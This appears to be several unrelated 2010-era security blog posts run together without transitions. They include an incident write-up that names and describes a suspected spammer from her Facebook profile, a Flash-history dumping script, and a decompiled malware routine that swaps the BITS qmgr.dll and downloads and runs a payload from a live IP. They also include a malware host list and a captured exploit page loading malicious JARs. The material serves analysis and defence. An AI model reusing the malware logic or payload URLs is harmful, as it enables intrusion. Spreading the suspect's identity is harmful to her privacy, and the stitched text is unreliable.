Introduction

Beginning on approximately May 18th, 2010 we received an email complaint relating to abuse from an IP address belonging to a network that I monitor. Early on, the FBI was directly involved in the case, so it has been treated with high regard. The compromised IP address belongs to a subnet range used for VPN access available to limited users. The account was disabled per standard procedure, but abuse continued. Further investigation suggested the hacker was of Romanian origin and has been using the network to send text message oriented spam since at least May 2010. The hacker continued to abuse the network for an extended period despite having disabled at 10-15 accounts and blocking several network blocks.

The Case

This compromise set represents an interesting case study for several reasons. First, the attacker maintained persistent access for several months. This access continued despite a well trained defensive team and a relatively unsophisticated attacker. Second, despite being familiar with SPAM and even having received numerous unsolicited text messages I was relatively unaware of text message spam as business. This attacker was very regimented and deployed numerous text messaging spam techniques and I assume generated reasonable profits. Finally, we spent time investigating this attacker and resulted in pictures of the likely attacker or at least of someone who likely is closely associated with the attacker – despite this information and the involvement of the FBI the attacker is little threatened.

Initial Reporting

The initial indicator for this compromise set was an email from a website that provides text messaging services. We have concerns regarding the overall legitimacy of the business given their primary revenue model appears to be a referral network and sending mass text messages. However, the website owner contacted us because a stolen credit card was used in purchasing their services from an IP address belonging to a network that I monitor.

We initially determined the account was compromised and disabled the user. Unfortunately, the problem resurfaced.

Given that this was a second known incident and that the FBI was involved we decided to dig more into this compromise to ensure the problem was solved and that other instances of the same issue were not continuing undiscovered.

When we examined the logs we again saw that the two incidents were linked by IP address. Upon closer investigation we also discovered the hostname appeared to be the same.

As the incidents were almost certainly linked, we decided to continue our analysis to ensure the problem did not continue to resurface.

What we’re seeing

The attacker is primarily sending text message oriented spam (see next few screenshots).

The attacker is using numerous tools to send SPAM. The spam is generally related to Voice and Text messaging services. Email to SMS gateways are spammed. Likewise SIP, Skype, and Yahoo Voice also appear to be abused. We suspect the attacker generates profit by driving telephone calls or text messages as indicated in the SPAM. The attacker is very regimented; generally logging in week days around 3pm EST (approximately 10 pm in Bucharest and sending SPAM throughout the night.

Other Activity

In the next screenshot we see the attacker accessing a US based system via FTP. While it may be possible our attacker has legitimate reason to access to this system, it is probably safer to assume this system (69.147.83.173 – an ip owned by Yahoo) is being attacked as well. This likely significantly increases the legal exposure given that an organizational IP appears to likely be compromising or attempting to compromise a remote web server.

Who is doing this?

Next we attempt to identify the attacker by following the various logs and traffic history. We have already observed that all IP addresses appear to originate in Romania. But it is conceivable that the attacker is merely pivoting from another system or compromised account. But let’s start with the IP address:

Next we look at traffic originating from the compromised vpn account. We see an automated weather beacon query MSN weather for a Romanian area.

Next, we see the user using a Romanian Google portal with a browser set to use the Romanian Character set.

We also see Skype querying a Romanian variant. The combination of a Romanian IP address, Romanian Language settings, a Romanian weather beacon, Romanian Google, and Romanian Skype gives us high confidence that the attacker is in-fact Romanian.

We continue to closely monitor the situation. We disable numerous accounts but continue to observe compromised accounts by IP and by hostname. On July 11^th, the attacker makes a signifigant mistake by logging into facebook. As shown below this exposes both a facebook user ID and a yahoo email address.

Again seeing the hostname, the Romanian language settings, and the activity being in the right time frame, etc we are confident this is our attacker.

First using the email address we examine the Yahoo profile , which claims to be a 25 year old woman named Ana from Schenectady, New York.

Next we take the Facebook cookie and examined the facebook page to again find a user named Ana.

Logging into facebook we find that Ana is from Bacau, Romania.

A close up picture:

And she might be single….

As you can see from above, she appears to have clicked on a Match.com link.

Analysis of the Attacker

With a strong degree of confidence we believe the attacker is the Romanian woman. This is supported by the IP addresses of the attack, browser settings, weather beacons, and the Facebook page. We know the attacker logged in as the Facebook user “Ana Maria”. This fact does not necessarily indicate that the Facebook user is the attacker, but the attacker certainly had access to a system with the Facebook credentials for that user. That system is the same system using compromised user accounts and sending text spam for several months. Additionally the user is the Facebook profile is in the expected geographic area. Therefore it seems likely the Facebook user is the attacker or a close associate.

Mitigations to date

We made numerous efforts to block this user. We have performed the following remediation activities:

• Blocked SSL VPN connections from a specified IP range
• Created an ACL to block a specified IP range
• Disabled approximately 15 accounts
• Throttled login attempts on the SSL VPN

Despite these mitigations the attacker was able to maintain access using simple side-steps. She cycled through numerous accounts. When we blocked her IP address she switched to a different range. When we blocked that range, she used another VPN account to log into our VPN.

Summary

We have learned several lessons from this on-going case. Foremost is our inability to directly mitigate ongoing attacks. We are extremely limited in the mechanisms we can utilize to prevent determined attackers. This attacker did NOT use sophisticated tools or techniques but has successfully utilized our network despite our efforts to prevent unauthorized use for an extended period. We knew exactly what the attacker was doing, who she was, and had several additional strategies to block her. However, organizational difficulties slowed this process. A key lessoned learned is that we must develop internal communication processes with other groups to ensure that our detection and understanding of an attack can be translated into effective mitigations. Additionally, as someone who has spent serious time performing penetration tests and writing custom tools, I would have hoped to have fared better against this attacker given that I presume to know her business fairly well. Alas, defense is much harder.

In answer to one, the problems is library architecture problem. Some people have blamed Microsoft for the issue. In particular, I saw MS criticized for including the Current Working Directory (CWD) in the path. Honestly, I can’t imagine doing otherwise. I’m pretty sure most applications would fall apart if the CWD wasn’t included in the path. A few sanity checks would be nice, and this is essentially what MS’s new registry settings provide. But for me, the problem is that developers are loading libraries without knowing explicitly what they are. Sure this helps out when there are shared libraries, but ultimately you can’t secure an application if developers don’t check what they’re executing. As a development architecture problem across many applications there is now simple fix.

Digging into the problem, I demonstrate it with the following short program:

Microsoft explicitly advises against using SearchPath to help load a library, but developers seem to love doing things like this. If the user browses to a directory to open a media file, the CWD changes, and SearchPath looks there and happily returns a path to a planted malicious DLL.

Two, I haven’t seen these exploits in the wild. Exploit-DB is being overwhelmed with POCs but I haven’t seen realistic attack vectors actually used. With minimal testing here are a few cases that I’m worried about:

• A user unknowingly having a writable SMB share to the Internet with media files located on the share. An attacker writes an appropriate, and possibly hidden, DLL to the share. When a user later accesses the media files and is compromised.
• A user attempting to download a media file, such as a movie, from a malcious webserver. If the targeted media file is linked correctly via SMB or WebDAV and an appropriate DLL is also in the directory the user may be compromised.
• A user to be compromised by a typical client side vector – downloading a malicious PDF, JAR, or EXE. That malware then downloads various DLLs and hides them in every network share it can find and compromises any network user who opens the targeted files.

Numerous applications seem vulnerable such as uTorrent, DivX player, Skype, PowerPoint, etc and users love to click things. There’s a lot of hype with this old bug, but I expect things could get messy.

Here’s a quick hack to dump visited websites from Flash cache files and the timestamps. This works in my exceptionally limited testing, but you should probably use something better than a POC for anything important:

#!/usr/bin/python
# mjw@cyberwart.com
# USAGE: dumpflashhistory.py
# eventually will add optional <-u username>
# NOTES: this is only a quick hack

import os, sys

def get_flashdirs():
    flash_dirs = []
    base_dir = os.getenv('USERPROFILE')
    flash_dirs.append(base_dir + "\\Application Data\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys")
    flash_dirs.append(base_dir + "\\Application Data\\Macromedia\\Flash Player\\#SharedObjects")

    return flash_dirs

def dedupe_sorted(arr):
    last = None
    ret = []
    for x in arr:
        if x != last:
            ret.append(x)
        last = x

    return ret

def get_flash_history(dirs):
    flash_files = []
    flash_dirs = []

    for d in dirs:
        for root, dirs, files in os.walk(d):
            for  dd in dirs:
                if dd.rfind('.', 4) > 0 and dd.find("\ ") < 0 and dd.rfind(".swf", 4) < 0:
                    #dd = dd.replace("#", '')
                    flash_dirs.append(dd + str(os.stat(str(os.path.join(root, dd)))[7:]))

    flash_dirs.sort()
    for x in dedupe_sorted(flash_dirs):
        print x

get_flash_history(get_flashdirs())

Next we have have Richard Bejtlich arguing that there is cyberwar here and here. He even goes on to argue the Chinese have “downed” F-22 fighters. His premise being that because some IP address in China being associated with an Internet compromise of a related defense contractor reported in April, the Chinese government has developed sufficient countermeasures to mitigate the prowess of the F-22 and thus it shouldn’t be purchased. Likewise not purchasing is apparently equivalent to destroying. He also claims to have special knowledge of the attack. I can only imaging that any special knowledge would be classified and that if he had the knowledge he couldn’t even reference it. Of course this is only speculation, but if one wants to debate an issue lets talk about verifiable evidence rather than unsubstantiated hyperbole.

Others including Sourcefire have jumped on the bandwagon, and Schneier posted a blog entry re-articulating his position.

My problem isn’t with Cyber War – it’s with the hyperbole. Every bit of evidence in the public space is consistent with run of the mill criminal activity. Aurora had links back to South Korea and Florida – as well as China. The infamous CRC code wasn’t uniquely Chinese. The F22 information compromise wouldn’t be considered war if a spy had grabbed papers physically – it would be classic espionage. Why would the medium suddenly change the nature of the event?

It’s easy say just call *this stuff* “cyber war”. I’m not being resistant to be pedantic. Rather, I think there’s a level of attack that could escalate well beyond the petty criminal or even espionage. Yes, the electric system is vulnerable. Yes it’s been speculated that hackers caused a sewage spill (I believe in Australia IIRC). I think these items begin to broach the warfare threshold. For instance, if a computer attack exploited a power system blew up a generator and caused a cascading power failure – the destructive impact might be similar to a cruise missile destroying the same target (though that is a wild guess). There would be possible loss of life and massive economic damage. But things could still get worse, imagine if enemy combatants could take control of a Predator and attack US troops; or if they could switch blue (friendly) and red (enemy) forces inside a blue force tracking system. Going crazy with speculative FUD I could even speculate that a determined attacker at a nation state level could hack a common autopilot system and cause it to engage and rapidly decent on landing – the result being horrific and definitely war like. Because these attacks are conceivable it’s important to maintain a reasonable threshold for “cyber war”. If not we will lack even the basic language to prepare to appropriately defend ourselves.

Again, the above is merely speculative FUD, but it has been my experience that all software is breakable given sufficient time and expertise. Rather than contractors stealing billions from the government in non-sensical products and services that make us no safer  or the NSA eroding our privacy, we should have serious discussions. Computers control huge aspects of life and could be leveraged to serious damage. But “cyber war” as currently described only lessens the conversation. The scary thing is that serious professionals are calling this stuff “war”, they say we’re losing (we are), but they think these low level attacks are nation states.

For instance, say I have a military force that needs to be trained. They’re to support the war on crime in south east DC. South east can be  a very violent place, there’s lots of crime, lots of armed men, and a high homicide rate. If I train them for “Crime war” they will likely be very adapt at that mission. However, if they’re destined fight a “war war” they will likely be entirely unprepared to face (say) the Chinese Army. You can imagine what might happen in those circumstances. I think the same is likely to be the case if we prepare defenses for cyber war by confusing it with cyber crime. Instead of addressing the real threats of cyber war everyone is running around shouting cyber war over weak criminal attacks trying to get sell an inappropriate service or tool.


int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
HANDLE v5; // eax@8
HRSRC v6; // esi@10
DWORD v7; // ebp@10
HANDLE v8; // esi@10
const void *v9; // eax@10
HRSRC v10; // esi@10
DWORD v11; // edi@10
HGLOBAL v12; // ebx@10
HANDLE v13; // esi@10
const void *v14; // eax@10
DWORD NumberOfBytesWritten; // [sp+8h] [bp-C68h]@10
HGLOBAL hResData; // [sp+Ch] [bp-C64h]@10
const CHAR ServiceName[4]; // [sp+10h] [bp-C60h]@1
char v18; // [sp+15h] [bp-C5Bh]@1
__int16 v19; // [sp+10Dh] [bp-B63h]@1
char v20; // [sp+10Fh] [bp-B61h]@1
CHAR Buffer; // [sp+110h] [bp-B60h]@1
const CHAR v22[260]; // [sp+214h] [bp-A5Ch]@2
const CHAR ExistingFileName; // [sp+318h] [bp-958h]@3
const CHAR MultiByteStr; // [sp+41Ch] [bp-854h]@2
const CHAR v25; // [sp+520h] [bp-750h]@4
char v26; // [sp+560h] [bp-710h]@4
char v27; // [sp+561h] [bp-70Fh]@4
__int16 v28; // [sp+61Dh] [bp-653h]@4
char v29; // [sp+61Fh] [bp-651h]@4
char v30; // [sp+620h] [bp-650h]@2
const CHAR v31[260]; // [sp+724h] [bp-54Ch]@2
const CHAR CmdLine; // [sp+828h] [bp-448h]@5
struct _WIN32_FIND_DATAA FindFileData; // [sp+928h] [bp-348h]@4
const CHAR FileName; // [sp+A68h] [bp-208h]@3
char NewFileName; // [sp+B6Ch] [bp-104h]@2

strcpy((char *)ServiceName, "BITS");
memset(&v18, 0, 0xF8u);
v19 = 0;
v20 = 0;
if ( !GetSystemDirectoryA(&Buffer, 0x104u)
|| (sprintf(&NewFileName, "%s\\dllcache\\qmgr.dll", &Buffer),
sprintf((char *)&MultiByteStr, "%s\\qmgr.dll", &Buffer),
sprintf((char *)v22, "%s\\kernel64.dll", &Buffer),
sprintf((char *)v31, "%s\\es.ini", &Buffer),
!GetWindowsDirectoryA(&v30, 0x104u)) )
return -1;
sprintf((char *)&ExistingFileName, "%s\\EventSystem.dll", &v30);
sprintf((char *)&FileName, "%s\\ServicePackFiles\\i386\\qmgr.dll", &v30);
if ( CheckIfLocalAccountIsAdmin() )
{
v5 = FindFirstFileA(&ExistingFileName, &FindFileData);
if ( v5 != (HANDLE)-1 )
{
FindClose(v5);
return -1;
}
NumberOfBytesWritten = 0;
v6 = FindResourceA(0, (LPCSTR)0x65, "SERV_DLL");
v7 = SizeofResource(0, v6);
hResData = LoadResource(0, v6);
v8 = CreateFileA(&ExistingFileName, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);
v9 = LockResource(hResData);
WriteFile(v8, v9, v7, &NumberOfBytesWritten, 0);
CloseHandle(v8);
v10 = FindResourceA(0, (LPCSTR)0x66, "SERV_INI");
v11 = SizeofResource(0, v10);
v12 = LoadResource(0, v10);
v13 = CreateFileA(v31, 0x1F03FFu, 7u, 0, 2u, 0xA0u, 0);
v14 = LockResource(v12);
WriteFile(v13, v14, v11, &NumberOfBytesWritten, 0);
CloseHandle(v13);
if ( ManipulateBITSService(ServiceName, 4u) == -1
|| (StopBITS(ServiceName),
Sleep(1u),
DisableWindowsFileProtection(&MultiByteStr),
Sleep(1u),
ReplaceOriginalQMGR_DLLwithEventSystem_DLL(
&NewFileName,
(int)v22,
(int)&MultiByteStr,
&ExistingFileName,
&FileName) == -1)
|| (SetFakeQMGRToOriginalQMGRFiletime((int)&ExistingFileName, v22),
SetFakeQMGRToOriginalQMGRFiletime((int)&MultiByteStr, v22),
SetFakeQMGRToOriginalQMGRFiletime((int)v31, v22),
ManipulateBITSService(ServiceName, 2u) == -1)
|| StartBITS(ServiceName) == -1 )
return -1;
}
else
{
CoInitialize(0);
memcpy((void *)&v25, "hXXp://210.211.31.214/img/xslu.exe", 0x40u);
v26 = aHttp210_211_31[64];
memset(&v27, 0, 0xBCu);
v28 = 0;
v29 = 0;
if ( !GetEnvironmentVariableA("TEMP", (LPSTR)&FindFileData, 0x100u)
|| (sprintf((char *)&CmdLine, "%s\\1yxf.exe", &FindFileData),
DeleteUrlCacheEntry(&v25),
URLDownloadToFileA(0, &v25, &CmdLine, 0, 0))
|| WinExec(&CmdLine, 0) <= 0x1F )
return -1;
}
return 0;
}

In case you missed it
hxxp://210.211.31.214/img/xslu.exe

[5/10/10 12:29:31 PM] mjw: 68.168.216.6 is malware
[5/10/10 12:29:41 PM] mjw: 82.211.7.32 malware
[5/10/10 12:29:46 PM] mjw: 83.169.37.246 malware
[5/10/10 12:30:06 PM] mjw: 91.203.133.223 malware
[5/10/10 12:30:18 PM] mjw: petwife.ru malware
[5/10/10 12:31:02 PM] mjw: 78.41.156.236 malware
[5/10/10 12:31:12 PM] mjw: 87.110.220.31 malware
[5/10/10 12:31:16 PM] mjw: prealpole.ru malware
[5/10/10 12:32:04 PM] mjw: 88.191.79.223 malware
[5/10/10 12:32:13 PM] mjw: 188.72.211.253 malware
[5/10/10 12:32:18 PM] mjw: wovenshelf.ru malware

Contents like:

HTTP/1.1 200 OK{D}{A}

Server: nginx{D}{A}

Date: Wed, 05 May 2010 04:00:01 GMT{D}{A}

Content-Type: text/html{D}{A}

Connection: close{D}{A}

Expires: 0{D}{A}

Pragma: no-cache{D}{A}

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0{D}{A}

Cache-Control: private{D}{A}

Content-Length: 1270{D}{A}

{D}{A}

< html > < head > < title > Bob’s Homepage < /title > < /head > < body > < applet width='100%' height='100%' code='JavaFX' archive='Games.jar

' > < param name='site' VALUE='Njg3NDc0NzAzQTJGMkY3MzcwNjU2QzZDNkM2RjYxNjQyRTcyNzUyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzR

DMxMzEyNjcwNjk2NDNEMzIyNjYyMzA=' > < /applet > < applet code='quote.GReader.class' archive='NewGames.jar' width='215' height='1

54' > < param name='data' VALUE='hxxp://spellload.ru/welcome.php?id=9&pid=2&1=1' > < param name='cc' value='1' > < /applet > < script

> {A}

var u = “hxxp: -J-jar -J\\\\70.86.147.162\\public\\002.jar none”;{A}

I was just surfing CNN and noticed I was logged into CNN via facebook. I was logged into facebook, but I can’t recall ever giving CNN the okay to access my facebook information. Additionally, there’s a Visual Studio 2010 ad – which I’m guessing is targeted. This implies that facebook is tracking the sites I visit and collaborating/conspiring with marketers to track my internet usage to better market products and make money. Alas, this is just too far for me. I’m going to say goodbye to facebook in the near future and would advise others to do the same.

Sorry no time for a proper write up.

You can’t understand the flight problem without a model. Yes you need data, but every mathematical model uses data. The purpose of this type of model is to estimate how an event affects the system – doing so in a mathematical valid manner that can be tested and the model itself evaluated with existing data. Therefore, I’d argue there’s no innate problem between a model and measurement/data. Models are heavy data consumers. They ingest the data attempt to correlate it together and then extrapolate future conditions. The easiest way for someone unfamiliar with modeling is to think back to the hurricane season. Based on a tremendous amount of data, models are used to predict the likely path of hurricanes, their predicted winds, their speed, and amount of flooding. The models are far from perfect, but generally they’re pretty good – and the best we can do.